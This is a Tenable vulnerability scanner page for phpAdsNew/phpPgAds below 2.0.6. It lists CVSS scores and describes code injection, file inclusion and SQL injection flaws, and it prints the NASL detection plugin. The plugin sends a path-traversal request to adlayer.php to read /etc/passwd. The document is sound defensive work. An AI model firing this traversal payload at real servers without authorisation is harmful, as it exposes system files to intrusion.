phpAdsNew / phpPgAds < 2.0.6 Multiple Vulnerabilities

2005-08-2900:00:00

www.tenable.com

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS

0.01

Percentile

84.0%

JSON

The remote host is running phpAdsNew / phpPgAds, an open source banner ad server.

The version of phpAdsNews / phpPgAds installed on the remote host suffers from several flaws :

Remote PHP Code Injection Vulnerability The XML-RPC library bundled with the application allows an attacker to inject arbitrary PHP code via the ‘adxmlrpc.php’ script to be executed within the context of the affected web server user id.
Multiple Local File Include Vulnerabilities The application fails to sanitize user-supplied input to the ‘layerstyle’ parameter of the ‘adlayer.php’ script and the ‘language’ parameter of the ‘admin/js-form.php’ script before using them to include PHP files for execution. An attacker can exploit these issues to read arbitrary local files provided PHP’s ‘magic_quotes’ directive is disabled.
SQL Injection Vulnerability An attacker can manipulate SQL queries via input to the ‘clientid’ parameter of the ‘libraries/lib-view-direct.inc.php’ script.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#


include('deprecated_nasl_level.inc');
include('compat.inc');

if (description) {
  script_id(19518);
  script_version("1.24");

  script_cve_id("CVE-2005-2498", "CVE-2005-2635", "CVE-2005-2636");
  script_bugtraq_id(
    14560, 
    14583, 
    14588, 
    14584, 
    14591
 );

  script_name(english:"phpAdsNew / phpPgAds < 2.0.6 Multiple Vulnerabilities");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
multiple vulnerabilities." );
 script_set_attribute(attribute:"description", value:
"The remote host is running phpAdsNew / phpPgAds, an open source banner
ad server. 

The version of phpAdsNews / phpPgAds installed on the remote host
suffers from several flaws :

  - Remote PHP Code Injection Vulnerability
    The XML-RPC library bundled with the application allows
    an attacker to inject arbitrary PHP code via the 
    'adxmlrpc.php' script to be executed within the context 
    of the affected web server user id.

  - Multiple Local File Include Vulnerabilities
    The application fails to sanitize user-supplied input to
    the 'layerstyle' parameter of the 'adlayer.php' script 
    and the 'language' parameter of the 'admin/js-form.php' 
    script before using them to include PHP files for 
    execution. An attacker can exploit these issues to read 
    arbitrary local files provided PHP's 'magic_quotes' 
    directive is disabled.

  - SQL Injection Vulnerability
    An attacker can manipulate SQL queries via input to the 
    'clientid' parameter of the 
    'libraries/lib-view-direct.inc.php' script." );
 script_set_attribute(attribute:"see_also", value:"http://www.hardened-php.net/advisory_152005.67.html" );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/408423/30/120/threaded" );
 script_set_attribute(attribute:"solution", value:
"Upgrade to phpAdsNew / phpPgAds 2.0.6 or later." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
 script_set_attribute(attribute:"plugin_publication_date", value: "2005/08/29");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/08/15");
 script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe",value:"cpe:/a:phpadsnew:phpadsnew");
script_end_attributes();

 
  summary["english"] = "Checks for multiple vulnerabilities in phpAdsNew / phpPgAds < 2.0.6";
  script_summary(english:summary["english"]);
 
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);


# Loop through CGI directories.
foreach dir (cgi_dirs()) {
  # Try to exploit the flaw in adlayer.php to read /etc/passwd.
  r = http_send_recv3(method:"GET", 
    item:string(
      dir, "/adlayer.php?",
      "layerstyle=../../../../../../../etc/passwd%00"
    ),
    port:port
  );
  if (isnull(r)) exit(0);
  res = r[2];

  # There's a problem if...
  if (
    # there's an entry for root or...
    egrep(string:res, pattern:"root:.*:0:[01]:") ||
    # we get an error saying "failed to open stream" or "Failed opening".
    #
    # nb: this suggests magic_quotes_gpc was enabled but the other flaws
    #     would still be present.
    egrep(string:res, pattern:"Warning.+main\(.+/etc/passwd.+failed to open stream") ||
    egrep(string:res, pattern:"Fatal error.+ Failed opening required '.+/etc/passwd")
  ) {
    security_hole(port);
    set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
    exit(0);
  }
}